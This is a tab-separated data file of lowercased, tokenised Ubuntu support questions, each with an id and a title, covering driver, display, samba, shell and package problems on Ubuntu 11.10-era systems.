76918	how do i get wireless and video working on a sony vaio vpc-z21x9r	os : ubuntu 11.10 kernel : 2.6.37.6 laptop : sony vaio vpc-z21x9r the problem : i ca n't change level of screen backlight ; also ca n't enable wi-fi . while using 3.0 kernel everything is ok , but the laptop discharges too quickly . results for lspci 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 5f ) vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) there is no wlan0 in ifconfig -a too . i 've fount that kernel should already have drivers for this graphics controller , but when i load up in restore mode , it writes `` fall '' while trying to load up some video drivers . to change the level of backlight i 've alrady tried : xbacklight -set xx , smartdimmer -s xx and got this init_ nvclock ( ) failed ! also sudo setpci -s 00:02.0 f4.b=xx with no results . as for wi-fi , i 've found driver but i do n't understand how to install it . here it is how can i fix these problems ? thank you for your help and time ! also tried to fix problems with backlight writing grub_cmdline_linux_default= '' quiet splash nomodeset acpi_backlight=vendor still no results . is there any sense in recompiling kernel , i mean 2.6.37.6 . can it make any improvements in the situation ?
76919	upgrade to mysql 5.5 on ubuntu 11.04	i 've seen that mysql 5.5 has a lot of innodb performance enhancements . is there an easy way to upgrade mysql 5.1 to 5.5 on natty ?
76920	call a shell script from php , run as root	i 'm running ubuntu 11.10 . i want to be able to call a shell script from php and run that script as root . when my php attempts to call the shell script as root -- like this : $ output = shell_exec ( 'sudo /var/www/my_script.sh ' ) i get this error in the apache log : sudo : no tty present and no askpass program specified i 've changed the owner of the php script to root : root . i 've added this line to sudoers : www-data all = nopasswd : /var/www/my_script.php i realize that i 'm supposed to comment out this line in sudoers : defaults requiretty however , there 's no such line in my sudoers file . what do i need to do to get past this error ?
76921	how do i set lightning as the default calendar app ?	i want to set thunderbird 's calendar extension , lightning , as the default calendar app . is this possible ?
76922	ruby-sinatra fails to install	i want to install the package ruby-sinatra on a ubuntu server 10.11 . it fails because this package depends on ruby-rack , which is an virtuall package . what can i do ?
76928	is there a global tool for measuring the dimensions of anything that 's rendered on your desktop ? alternative to kruler ?	i do a lot of webdesigning , and often i have to compare the browser-rendered results to the layouts . is box so-and-so really 25px away from box such-and-such . yet for every aspect there is a different tool , so the whole work-flow kind of blows . i do not want to use gimp to measure the layouts , and i do not want to use some browser-extension to verify how things are rendered in the browsers . i want a unified experience . i want a tool that runs independent from the browser/image-viewer . the best thing i could compare my fictional program to would be gcolor2 , which is a universal color picker . only i do not just want to pick colors , i want to measure any thing that is rendered on my desktops as pixel-perfect as possible . and that includes a zoom-option , as it would be insane to try to measure a few pixels while having a resolution of 1680x1050 . and it should be easy to use , the workflow of of gimp2 is not that bad , downsides being it only works in gimp , gimp has an incredible starting time , and it strangely hides the box-dimensions whenever i let lose of the left mouse button after sizing the appropriate box and effectively hiding the very information i was looking for in the first place . i hope i have made myself clear and look forwards to your recommendations : ) sidebar : trying to be a good questioner i did a apt-cache search and stumbled upon kruler , a tool which gets the idea , but is n't very well executed from the usability perspective . so not an option .
76932	i think a ppa update broke my system . what can i do ?	a few weeks ago i installed ppa : ricotz/testing on ubuntu 11.10 . it worked fine then , but since a recent upgrade , trying to launch gtk applications results in lots of cryptic errors . can i revert all packages updated by ppa : ricotz/testing to the versions in the main ubuntu repositories ?
76934	how can i get my windows to remember the last window location ?	i want to ask the same question for ubuntu 11.10 ... how can i configure ubuntu 11.10 to start all program windows at the last window location ? this feature would be really helpful . : )
76948	problems connecting msn with empathy	i do n't know if i am the only one with this bug , but i ca n't use my msn account with a freshly installed ubuntu 11.10 with empathy . it used to work with my arch linux , but now with ubuntu , it continuously tries to connect but nothing happens . how can i solve this problem ?
76952	very slow boot up time and low battery life	i have a i3 laptop with ubuntu 11.10 ( 64bit ) and the boot last 30-40 seconds ... . how can i make it faster ? also my laptop is just 5-6 mounths and my battery last only 2h 2h 20min with jupiter and the brightness at the minimum level can anyone help ?
76954	remove duplicate locations in datetime indicator	i have a bug that has started appearing recently . no matter what i try , there is always a duplicate location entry in the indicator-datetime . i have no other locations added ; this is just my primary location . see this picture for clarification : what should i do to remove the duplicate location ?
76955	how to make /var/www/html same as my /var/tmp directory ?	i am using one software , who can save files to /var/tmp but not in /var/www/*.* . i did applied chmod -r 777 /var/www . but still it can write to /var/tmp but not /var/www how can i resolve this ? ( i know its secured but its very private testing purpose )
76963	auto compile service on for ubuntu packages ?	is there any service provided by ubuntu , to automatically compile source to binary deb packages , and for multi-architecture ?
76967	is there a command to `` manually automount '' an attached disk ?	i have an extra hard drive which i use for backups . the label on its one and only partition is `` backup '' . when i open nautilus and click on `` backup '' it mounds the drive in `` /media/backup '' , and then there 's a little eject button next to it 's icon in nautilus . if i manually mount the drive by creating a directory and using `` sudo mount /dev/sdx /some/dir '' , the eject icon still shows up in nautilus , but when i press it i get an error because the device was not mounted via whatever it is that mounts it the other way . what i would like is to be able to do this `` mount to /media/backup and enable the eject button '' via the command line . the goal is to have the device mounted by a script which needs the drive , but then leave it mounted until i manually eject it ... if i want to . p.s . i 'm aware that i can have the drive auto mounted at startup , but that 's not what i 'm looking for here , and i 'd like to know if this is possible . clarification : i 'm looking for a command to `` mount the drive the way nautilus would '' . this should create the directory `` /media/backup '' , mount the device to that directory , and then when i press the eject button from nautilus , it should unmount the device and delete the directory .
76973	how to find small non-empty folders ?	i would like to find ( later delete ) all music folders that are nearly empty ( banshee deletes only the music files but not the other files in there ) . i tried with : find -type d -size -500k \ ; but it shows folders that contain bigger files too . find -type d -size -500k -exec du { } \ ; shows the correct size . how to modify the find cmd to only show folders that are smaller then n ?
76974	any rhythmbox plugin for grooveshark out there ?	i ca n't find a plugin to listen gs on rb for ubuntu . i currently run 10.04 .
76976	change xorg.conf based on displaylink monitor detection using lightdm	i 've purchased a usb driven external display for my laptop . i 've gotten it working by adding a xorg.conf file , however when the usb monitor is n't plugged in i want the xorg.conf to disappear so that xrandr works normally . i use my laptop on its own , with the usb display , and docked to dual external displays . i figure i just need to find a good way to move the xorg.conf back and forth based on detecting the usb display . since it seems to come up sa /dev/fb0 and /dev/fb1 i figured i could get lightdm to check in it 's init.d script perhaps ? that seems a bit unmaintainable though as upgrades/etc happen . is there a better way to manage this ? since it 's displaylink it ca n't be hot swapped , the monitor has to be plugged in and ready at boot . so i need something before lightdm gets going i think to set this up . thanks for any tips and ideas . edit : bonus points for something that `` undoes '' itself on shutdown automatically so i do n't have to worry about the xorg.conf being there on the next boot .
76980	2 icons for keyboard switch on gnome panel in gnome shell 3	i have 2 icon do the same think ( switch keyboard layout ) in ubuntu 11.10/gnomeshell . i think it is because i whitelist whole systray-area . icon in systray ( num . 1 on picture ) consume much space and i like remove it . it is posible ? screenshot :
76981	can not make wi-fi hotspot	i want to make my laptop as wi-fi hotspot . to do so , i pressed button settings- > network- > wireless- > use as hotspot.. then it creates a wireless network connection 'hostspot ' and connects . but it gets disconnected just after making connection . here is my network hardware info : sudo lshw -c network *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=8.83.5.1 build 33692 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:47 memory : d9200000-d9201fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 02 serial : size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.1.4 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:45 ioport:2000 ( size=256 ) memory : d5010000-d5010fff memory : d5000000-d500ffff memory : d5020000-d502ffff my machine is running on ubuntu 11.10 can anybody help in it ? thanks
76987	how can i prevent someone from resetting my password with a live cd ?	recently one of my friends came over to my place , within 15 minutes he hacked my account using a live cd and reset the password in front of me . i was baffled to see such a thing . please guide me to prevent such a future attempt using a live cd .
76994	screen stays black after closing and reopening the lid	when i close the lid or leave the computer on for a bit the screen goes black and freezes that way . i have tried changing both screen and power settings as well as changing workspaces . nothing seems to unfreeze or wake-up the computer . i just installed 11.10 from 11.04 , never had this problem with 11.04 . was able to close and open lid just fine . considering reinstalling ... help ?
76995	workspace stays fixed on external monitor when switching workspace	im using ubuntu 11.10 , running , and loving , the gnome3 interface . i am running an optimus enabled laptop with bumblebee . i just figured out how to put the top panel on my external monitor ( connected via vga ) , which therefore makes my external my 'primary ' monitor ( a.k.a thats where all the action happens ) . however now i notice that when i switch workspaces , only the external monitor switches , my laptop screen remains in a fixed workspace . it should be noted that if move the top panel back to my laptop screen , the problem reverses in that the workspace on my external monitor remains fixed when switching workspaces , i just did n't notice this before . is there any way to get my laptop screen to switch as well ? thank you
76999	how to disable plymouth ?	apache ask for passphrase redirects to plymouth even when i 'm remoted in using ssh and away from console . how can i disabled plymouth ? update : i did learn that i can sudo plymouth -- quit and that will shutdown plymouth . i would like to know the recommended way to disable plymouth on boot .
77000	how to add m4v files to ipod classic using banshee	i am running gnome shell 3.2 on ubuntu 11.10 and banshee 2.2 . i sync banshee with my ipod classic 80 gb . i have enabled syncing music - sync entire library option and video syncing is set to manual . when i drag m4v files from my banshee library to my ipod , it gives an error 'the m4v format is not supported by this device , and no converter was found to convert it ' . of course my ipod can play m4v files - i had synced it in itunes earlier without any difficulty . what is missing ? what do i need to do ?
77004	stuck at `` detecting file systems '' while trying to install on an acer aspire one d255e	trying to install ubuntu 10.10 32 bit from a usb onto my acer aspire one d255e . windows xp 32 bit is installed . when i boot from my usb and then select the parition sizes ( splitting ubuntu to 200gb and windows xp to 30gb ) , the menu allows me to continue but remains stuck at `` detecting file systems '' i do not know if it is because of windows xp because ubuntu 10.10 installation worked when i had it use the whole partition .
77006	black screen when booting up on an hp pavilion g6	when i try to boot ubuntu 11.10 from cd or from a usb drive the screen turns blank right after the disc menu . i can tell the machine is booted up and running but there is no screen . i have an hp pavilion g6 . how do i get past this so i can install it ?
77007	sharing between two ubuntu 11.10 systems not working for me	i am using ubuntu 11.10 on both of my pc 's . i wanted to access pc2 's shared directory from pc1 . so in pc2 , from nautilus file manager , right-clicked on the directory that i want to share with the other pc , and clicked on `` sharing .. '' . it asked me to install samba - which i did . then i was asked to restart - which i did . i had to do the same steps for the other pc also - which i did . but after that when i clicked on `` browse network '' , it showed `` windows network '' . double-clicking on it shows `` failed to retrieve share list from server '' . later i installed gsamba and simply went with the default settings . i did this for both systems . but still i ca n't access the other system from network . may be i am missing some steps here . need your help please to solve this . thanks in advance .
77010	blank screen after choosing grub option -- can boot from livecd no problem	installed ubuntu oneiric ocelot 11.1 a few weeks ago without issue on my amd dual-core desktop machine ( home-built ) with amd/ati radeon xfx `` hd 4350 '' graphics card . recently i was trying to update grub 2 to detect my windows 7 installation on the machine , and followed instructions on this page -- which resulted in grub failing to load upon restart ( i got the `` grub rescue '' prompt ) . in trying to recover from my new problem , i followed some instructions on this page -- mainly this bit : sudo -i mount /dev/sda7 /mnt mount /dev/sda6 /mnt/boot # skip this one if not have a separate /boot partition grub-install -- root-directory=/mnt/ /dev/sda which has now resulted in my main problem : main problem : now my computer will boot to grub , but if i let it load oneiric the screen will go blank immediately afterward and stay blank after reboot -- also , the monitor will turn off and claim `` no signal '' . this can only be remedied if i boot to the livecd and then turn my monitor off and on again* . my extremely ignorant opinion is that this is some kind of graphics card detection problem , but i do n't know how i caused it or how to fix it . thoughts ? i have also recently been trying to troubleshoot ( i.e . googleshoot ) some problems related to graphics in gnome 3 -- i do n't have specifics unfortunately , and no step i took resulted in bad behavior immediately afterward , but i suppose i might have screwed something up . *at first i thought the recovery process was more complex but have since simplified it .
77022	all .doc file auto changed to .exe in the network sharing folders	i have a ubuntu shared folder in my network using samba . but recently when i try to access the folders , i noticed almost 90 % of all my .doc/.ppt/.xls file changed to .exe file . i tried to list all the files in the folder using the command : ls-la - ? ? ? ? ? ? ? ? ? ? ? ? ? ? text1.doc -r -- r -- r -- 1 crm users 705312 2008-07-20 01:42 text1.exe however in windows , i only saw the text1.exe file . i tried to change the file permission for text1.doc using chmod , however it shows me ( input/output error ) any ideas ?
77029	how to run mu online ?	hi i am new in ubuntu still . i want to run mu online it is just 1 game with i play , but still can not run it . i downloaded wine program , but it looks that i need to download more or to do something . when i go to webzen page and click start game they offer me download webzen game starter . i downloaded it and instaled , but whne i press again start game it sed that i must download webzen game starter again . = ( can somene help me ?
77035	how do i compile gcc 4.3.4 ?	how can i compile ( or just install ) gcc 4.3.4 on my ubuntu 11.10 ? i 've tried to download and compile it with these instructions : http : //whowhywhathow.blogspot.com/2011/01/compile-gcc-from-souce-on-ubuntu-10041.html but it just end up with an error during the compilation : http : //pastebin.ca/2092965 hope someone here can help me
77036	how do i install solr-jetty 3.4.0 ?	does anyone know of a package which install solr-jetty with solr version 3.4.0 on oneiric ( 11.10 ) ? the official solr-jetty package has solr version 1.4.1 , which is n't up-to-date ( for my uses ) .
77041	how is gnote different from tomboy ?	from what i have seen , they look absolutely similar and their functionality are pretty much the same . see the attached image :
77043	change lock screen to the current wallpaper ?	when i lock ubuntu 11.10 , but before i unlock it , the screen is black . is there any way to change the black background to , say , a current wallpaper ? it would be nice to see a wallpaper while the system is locked . much more pleasing to the the eyes !
77044	change defaults	i want to create a custom distro . i want to change some default that they could be seen on my live disk : 1 ) change default icon pack to faenza-ambiance 2 ) change default start up apps to dockey & synapse & weather & blueman 3 ) change default shell ( gui ) to gnome3.2 4 ) change default theme to adwaita 5 ) change default cursor to adwaita any ideas ?
77045	which is best to use on a headless server that is going to be use as virtualization host ? kvm / xen / qemu ?	okay , the main purpose is to learn about virtualization and play around with it . however , i have a problem of determining which is best for a headless server . i want to run several linux distributions as well as windows guests . on a side note : this is not the first time i am going to use virtualization . for more than 3 years i have been using vmware workstation and virtualbox to run guest vms however , now i want to run vms/ves in a headless server as they do in industry . i know , in industry there are lot of advanced technologies are being used but , still i want to try them in small-scale . as i mentioned before , this is purely for educational purposes . if you 're wondering what kind of system that i am going to use as my host , here are some details : intel processor that supports hardware virtualization ( intel-vt ) 8gb ram more than enough hard disk space ( ~1tb ) can you give me some suggestions , directions and links for tutorials and guides ? p.s . i installed vmware vsphere hypervisor on my `` host '' and later noticed that it uses just over 1gb of ram just to run the hypervisor . it is not an efficient solution for me because i have only 8gb ram in my machine . typical linux headless server only uses ~300mb ram just to run . so , i prefer linux server . in fact i love foss : ) : )
77058	my mouse pointer disappears on `` system surfaces '' , like background picture , menus , background for all kind of system menus	i have an annoying problem with ubuntu 11.10 , my mouse pointer disappears on the ubuntu surface ( not in programs like firefox , libre office .. ) the mouse pointer is there , but its size is only one pixel and in the white background of e.g . `` system '' it is not seen at all , although with `` ctrl '' i can see where it should be . i have not found any place where i can change the size or colors of the mouse pointer . can anybody help me ?
77059	usb 2.0 and nic not recognized on a asus m5a97 pro	i have much trouble with ubuntu 11.10 . i have a quite new system with an asus m5a97 , and neither nic nor usb 2.0 are working . the first problem could be solved by using a vendor driver , but the latter still exists . mouse ( logitech mx900 ) and keyboard ( logitech illuminated kb ) are not recognized . i have older devices with i have kept for emergencies plugged to usb 3.0 or ps/2 which are then regognized and working . this chipset problem almost only exists in ubuntu , live cds based on other distrubutions ( system rescue cd , parted magic ) work just fine . there is a guy reporting to have the same problem with archlinux , but it has n't been solved to date : https : //bbs.archlinux.org/viewtopic.php ? id=125735 is there any chance that this issue ( the board is out for sale since january ) will be solved one day ? has anyone an idea what to do to get the onboard usb running ? apart from switching to another distribution , of course .
77065	use a calendar as desktop wallpaper	is it possible to use a calendar as a desktop wallpaper ( it could be a simple calendar application pinned to the desktop ) ? i am hopping for something looking like this : ideally the calendar should sync to google calendars .
77066	modify xfce startup applications	normally i like it when a terminal window pops up immediately after startup , since i 'm a heavy cli user in linux . however , my preference is to have the terminal maximized , particularly on my laptop , and the standard xfce4 startup execution leaves the terminal window to standard size . i 've tried the following : checked the .desktop files in both /usr/share/applications & /.local/share/applications checked xinitrc in /ect/xdg/ for terminal startup . a change here resolved an issue with both xfce & gnome screensavers running simultaneously , but did nothing for the terminal issue . checked application autostart in xfce4-session-settings , but there 's no default terminal entry . when i add one , two terminal windows pop up on startup . according to several guides i 've found , editing the xinitrc file is key to the startup . however , i found no explicit terminal execution calls in that file . what is needed to modify the default terminal startup settings ? edit after further investigation , it turns out it was a setting in gnome that set the process off . i switch between gnome , kde and xfce for desktop environments , and the terminal popup was based on the gnome startup settings . when that was modified , the terminal now shows up full-sized with no problems .
77071	is there a way to run `` planner '' in kubuntu ?	i have quite an extensive project planned with planner but switched my desktop to kubuntu to get away from the unity desktop of ubuntu . issuing the command sudo apt-get -s install planner gives the following output : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : planner 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . inst planner ( 0.14.5-0ubuntu1 ubuntu:11.10/oneiric [ i386 ] ) conf planner ( 0.14.5-0ubuntu1 ubuntu:11.10/oneiric [ i386 ] ) i have the following questions : is there a way to make planner work in kubuntu ? or is there an alternative project planing software in kubuntu ? what is the reason , why it does not run ?
77081	my gui has downgraded itself , and performance improved . why and why ?	i am using ubuntu 11.10 . at some point through the day today the gui seemed to downgrade itself . in some applications the text became grainy , and some icon titles on the desktop became difficult to read . the upside is that performance really improved . i can now switch between my applications much faster than i could previously . what might cause this ? i 'd like to be able to repeat it ! updates : i was not aware of changing anything . i certainly did n't install anything new on the pc , and i was not aware of any automatic upgrades my system settings says the graphics driver is unknown and the experience is standard i 'm about to reboot the pc and see if the condition persists ! i hope its not magic . that would make it difficult to reproduce , would n't it ? just noticed the shutdown menu ( top right ) is missing . had to start a terminal session to shutdown screenshot here 's lspci output : 00:00.0 host bridge : intel corporation 440bx/zx/dx - 82443bx/zx/dx host bridge ( rev 01 ) 00:01.0 pci bridge : intel corporation 440bx/zx/dx - 82443bx/zx/dx agp bridge ( rev 01 ) 00:07.0 isa bridge : intel corporation 82371ab/eb/mb piix4 isa ( rev 08 ) 00:07.1 ide interface : intel corporation 82371ab/eb/mb piix4 ide ( rev 01 ) 00:07.3 bridge : intel corporation 82371ab/eb/mb piix4 acpi ( rev 08 ) 00:07.7 system peripheral : vmware virtual machine communication interface ( rev 10 ) 00:0f.0 vga compatible controller : vmware svga ii adapter 00:10.0 scsi storage controller : lsi logic / symbios logic 53c1030 pci-x fusion-mpt dual ultra320 scsi ( rev 01 ) 00:11.0 pci bridge : vmware pci bridge ( rev 02 ) 00:15.0 pci bridge : vmware pci express root port ( rev 01 ) 00:15.1 pci bridge : vmware pci express root port ( rev 01 ) 00:15.2 pci bridge : vmware pci express root port ( rev 01 ) 00:15.3 pci bridge : vmware pci express root port ( rev 01 ) 00:15.4 pci bridge : vmware pci express root port ( rev 01 ) 00:15.5 pci bridge : vmware pci express root port ( rev 01 ) 00:15.6 pci bridge : vmware pci express root port ( rev 01 ) 00:15.7 pci bridge : vmware pci express root port ( rev 01 ) 00:16.0 pci bridge : vmware pci express root port ( rev 01 ) 00:16.1 pci bridge : vmware pci express root port ( rev 01 ) 00:16.2 pci bridge : vmware pci express root port ( rev 01 ) 00:16.3 pci bridge : vmware pci express root port ( rev 01 ) 00:16.4 pci bridge : vmware pci express root port ( rev 01 ) 00:16.5 pci bridge : vmware pci express root port ( rev 01 ) 00:16.6 pci bridge : vmware pci express root port ( rev 01 ) 00:16.7 pci bridge : vmware pci express root port ( rev 01 ) 00:17.0 pci bridge : vmware pci express root port ( rev 01 ) 00:17.1 pci bridge : vmware pci express root port ( rev 01 ) 00:17.2 pci bridge : vmware pci express root port ( rev 01 ) 00:17.3 pci bridge : vmware pci express root port ( rev 01 ) 00:17.4 pci bridge : vmware pci express root port ( rev 01 ) 00:17.5 pci bridge : vmware pci express root port ( rev 01 ) 00:17.6 pci bridge : vmware pci express root port ( rev 01 ) 00:17.7 pci bridge : vmware pci express root port ( rev 01 ) 00:18.0 pci bridge : vmware pci express root port ( rev 01 ) 00:18.1 pci bridge : vmware pci express root port ( rev 01 ) 00:18.2 pci bridge : vmware pci express root port ( rev 01 ) 00:18.3 pci bridge : vmware pci express root port ( rev 01 ) 00:18.4 pci bridge : vmware pci express root port ( rev 01 ) 00:18.5 pci bridge : vmware pci express root port ( rev 01 ) 00:18.6 pci bridge : vmware pci express root port ( rev 01 ) 00:18.7 pci bridge : vmware pci express root port ( rev 01 ) 02:00.0 usb controller : vmware usb1.1 uhci controller 02:01.0 ethernet controller : intel corporation 82545em gigabit ethernet controller ( copper ) ( rev 01 ) 02:02.0 multimedia audio controller : ensoniq es1371 [ audiopci-97 ] ( rev 02 ) 02:03.0 usb controller : vmware usb2 ehci controller
77084	how can i convert mp3 to speex ?	what is a good way to convert mp3 files to speex files ? i 'll favor answers that give an easy solution for converting multiple files at a time and/or maintain good quality for spoken audio . though any solution will be appreciated since i have n't found even a difficult way that works .
77087	samba not mounting locations	when i go to the network and i try open a file which is in another computer . the specific location is not mounted and the same problem occurs when other users try to read my files
77092	terminal sending error 11	when trying to install any package in a terminal , i get the following error not possible to block /var/lib/dpkg/lock - open ( 11 : temporaly not available resource ) this started happening after trying to install microsoft font libraby . it stopped at : '' ttf-mscorefonts-installer '' configuration window
77111	setting firefox hot keys to be like in windows	i have been using firefox for years on windows and i do a lot with keyboard . for example , ctrl-y shows the downloads . and now on ubuntu all this is broken . i need an easy way to set windows-firefox keyboard shortcuts for ubuntu-firefox .
77114	some notifications are not showing for empathy	i am on ubuntu 11.10 and using gnome shell . since installation i am noticing that when my contacts signs in or signs out , there is no notification showing at gnome shell . the sound notification works though . i am getting the sound but no visual notification . at unity it is working well . the problem seems to be gnome shell specific . does anyone else faced similar issue ?
77116	missing option to lock screen after last remote desktop session disconnects	after installing 11.10 i noticed that the blanking the monitor froze my system ( it was not trying to sleep ) when i turned that off the the screen did not lock ; also there was no option to lock the session when the last vnc session disconnected . i removed the gnome-screensaver package and installed xscreensaver . now it locks just fine on the timeout , but i still need it to lock after the last vnc session disconnects .
77118	sound problem on lg-x130 netbook	i recently installed 11.10 on my lgx130 netbook . it was making an irritating noise sometimes but it started to be more frequent . do n't know why , what should i try ?
77124	get kubuntu , mythbuntu , edubuntu , xubuntu etc in ubuntu	hey i want best of all worlds and hence i want that i have kubuntu , edubuntu xubuntu etc in my single ubuntu installation can someone please help ? ?
77126	orphaned cd-rw symbol in the unity bar	i have an orphaned cd-rw symbol in the unity bar which does not disappear again . how could i get rid of it ( it 's oneiric ) ?
77127	how to discard saved password for samba share in unity ?	i access samba shares from unity on ubuntu 11.10 and saved username/pass for it . now , i want to use a different username . each time i go to the share and open it , it just opens without asking for credentials . how can i force it to forget the saved credentials ?
77134	where is rhythmbox 's playlist information stored ?	i want to know where playlists , created in/with rhythmbox are stored and located ? i need those files , in order to import all of my rhythmbox playlists into banshee .
77137	how to create daily job without write access to /etc ?	i do n't have write permissions to /etc and its sub folders , but even do i would like to have bash script that is executed every morning . how to set it up ? also when i type cron in command line i get cron : ca n't open or create /var/run/crond.pid : permission denied p.s . this is follow up question to how to append text to file every morning ? p.s.2 . sometimes i do n't turn off my computer , so i would rather not use `` auto-start ''
77138	o2 mobile broadband wo n't connect with a huawei e173	it 's connected and configured via the wizard but enable mobile broadband is unchecked by default and nothing happens when i click it . when i click on the o2 mobile broadband connection itself it briefly ( around half a second ) connects ( the icon changes ) then disconnects and i get the notification disconnected from network . the usb modem is huawei e173 . i understand there have been some issues in this regard with 11.10 and just wondered if anyone else had gotten one working ?
77140	`` can not find -lopencl '' error when making the cuda sdk	i have an asus notebook with nvidia gt 520m and thought about trying some opencl programming ( first time ) on ubuntu 11.10 . i installed the nvidia-current-dev package . thus , i found libopencl.so and such in /usr/lib/nvidia-current/ folder : $ razvan @ ... : ~ $ locate libopencl.so /usr/lib/nvidia-current/libopencl.so /usr/lib/nvidia-current/libopencl.so.1 /usr/lib/nvidia-current/libopencl.so.1.0 /usr/lib/nvidia-current/libopencl.so.1.0.0 /usr/lib32/nvidia-current/libopencl.so /usr/lib32/nvidia-current/libopencl.so.1 /usr/lib32/nvidia-current/libopencl.so.1.0 /usr/lib32/nvidia-current/libopencl.so.1.0.0 i then installed the cuda toolkit for ubuntu 10.10 from nvidia website and also the nvidia gpu sdk ( in /opt/gpu_sdk ) . when i go to /opt/gpu_sdk/opencl and try the make command i get : razvan @ ... : /opt/gpu_sdk/opencl $ make make [ 1 ] : entering directory `/opt/gpu_sdk/opencl/common' a - obj/release/oclutils.cpp.o make [ 1 ] : leaving directory `/opt/gpu_sdk/opencl/common' make [ 1 ] : entering directory `/opt/gpu_sdk/shared' make [ 1 ] : leaving directory `/opt/gpu_sdk/shared' make -c src/oclconvolutionseparable/ make [ 1 ] : entering directory `/opt/gpu_sdk/opencl/src/oclconvolutionseparable' /usr/bin/ld : can not find -lopencl collect2 : ld returned 1 exit status make [ 1 ] : *** [ ../../..//opencl//bin//linux/release/oclconvolutionseparable ] error 1 make [ 1 ] : leaving directory `/opt/gpu_sdk/opencl/src/oclconvolutionseparable' make : *** [ src/oclconvolutionseparable/makefile.ph_build ] error 2 afeter installing the nvidia-current-dev package i went to /etc/ld.so.conf.d/ and made nvidia-current.conf where i specified /usr/lib/nvidia-current and /usr/lib32/nvidia-current . then i used ldconfig for caching the new locations . needless to say , it did n't work . i also appended the /usr/lib/nvidia-current and /usr/lib32/nvidia-current to the ld_library_path environment variable in the hope of working ... it did not work .
77143	keyboard issues after resuming from sleep on a dell vostro 13	i 'm using ubuntu 11.10 x64 . it 's running on my dell vostro v13 . everything works great until i shut the lid of my laptop ( puts laptop into sleep ) . once i come back and resume working in ubuntu , typing becomes a chore . ubuntu misses a lot of the keypresses from my keyboard . it usually results in me mashing my keyboard until the letter appears . a full system reboot fixes the problem . again , typing is never an issue unless i resume from sleep . any ideas ?
77145	how to determine all python-nautilus extensions in use ?	i need to provide an application developer with a list of all other python-nautilus extensions i have installed/running ( i am trying to provide information on this issue ) . what is the easiest way to get a list of these extensions on my machine ? ( please tag this with `` python-nautilus '' )
77146	ipv6 still used even network manager ipv6 set to `` ignore ''	i am running ubuntu 11.10 ( via wubi ) . when ipv6 is set to `` ignore '' with network manager , the machine still creates an auto-configured address and will use it ( for example firefox accessing http : //www.google.com ) instead of using the ipv4 address . am i missing anything ? i know that there are other ways to disable ipv6 , but still would like to understand the meaning of this `` ignore '' option .
77149	how to find text and replace that line if exists with terminal otherwise just append line to end	i want to put in sudo gedit /etc/sysctl.conf the one line vm.swappiness=10 which i sometimes change . by default this line doesnt exist so i use echo `` vm.swappiness=10 '' | sudo tee -a /etc/sysctl.conf . if i would always be putting the same exact line vm.swappiness=10 , then in case i want to replace i could use sudo sed -i 's/vm.swappiness=10/vm.swappiness=1/g ' /etc/sysctl.conf but since there could be vm.swappiness=12 or something else , i want -- with just a single command -- to find if , in /etc/sysctl.conf , there exists line starting vm.swappiness= . then if it does exist i want to remove the whole line ( then by appending & & echo `` vm.swappiness=1 '' | sudo tee -a /etc/sysctl.conf to that command , it would also subsequently add the new configuration line that i want to the end . but again since there could be a lot of different parameters in one line , it would n't be good to delete it all , but would be better to change only the number ( to the immediate right of vm.swappiness= ) . what you think ? would it be better to search for vm.swappiness=x ( x ( x ) ) with 1 to 3 numbers ( of course , 100 also exists ... ) , replace if it 's there ( by putting it into a variable and using a command like `sudo sed -i 's/ $ oldline/ $ newline/g ' ) , and if not then just append vm.swappiness=10 ?
77152	how to get apt to make files in /var/cache/apt/archives always world-readable ?	i want the files in /var/cache/apt/archives to always have read permissions for everyone . that is , whenever apt downloads a new file into this directory , it should make it world-readable . this is not the case currently , an example entry from ls -l /var/cache/apt/archives looks like this : -rw -- -- -- - 1 root root 26928 2009-05-03 20:34 /var/cache/apt/archives/sl_3.03-16_amd64.deb what should i do to have the files always world-readable ? ( aside : i want this because i have a few ubuntu laptops on a lan and using scp or rsync i occasionally copy /var/cache/apt/archives from one laptop to the other . i do n't use apt-cacher or squid-deb-proxy etc because at any point any subset of the laptops might be connected to the network ; i have no central server . )
77154	banshee-extension-coverwallpaper is not working	i have installed the user-extension-pack for banshee , including the coverwallpaper-extension . everything else is working as is should , but althoug i activated cover wallpaper at the extension-tab in the settings-window , my background is n't changing . what should i do ?
77156	how to get line number from grep ?	the fallowing grep grep -r -e -n coll * will display fullpath/filename : < tag-name > coll < /tag-name > i would like to know what line has the fallowing text , i tried adding -n , but it did not work . i tried adding | grep -n * , but it did something weird . what i would like to see ( i do n't care about format ) fullpath/filename:10 : < tag-name > coll < /tag-name >
77160	how can i tell what workspace i am in with unity ?	long time user of ubuntu struggling to use unity here ... . i am running unity 2d and can click on the workspace launcher icon to switch to a different workspace . however if i just walk up to a system , how can i tell by looking what workspace i am on ? is the launcher icon supposed to change when you change workspace ? is there an indicator applet for this i can install ? i am used to the old gnome workspace switcher in the middle of the top panel !
77163	chrome not working with launcher	i 'm using the dev chrome , but it 's interfering with unity launcher , whenever i press win key to access the dash nothing happens neither the alt+tab works , at least over chrome , but in the background they do , i can see the notification bar icons change color , just like when the dash is opened , but chrome appears to be on a `` always on top '' configuration , the same happens to the launcher ... does anyone knows a workaround ? obviously without having to switch back to the stable chrome version .
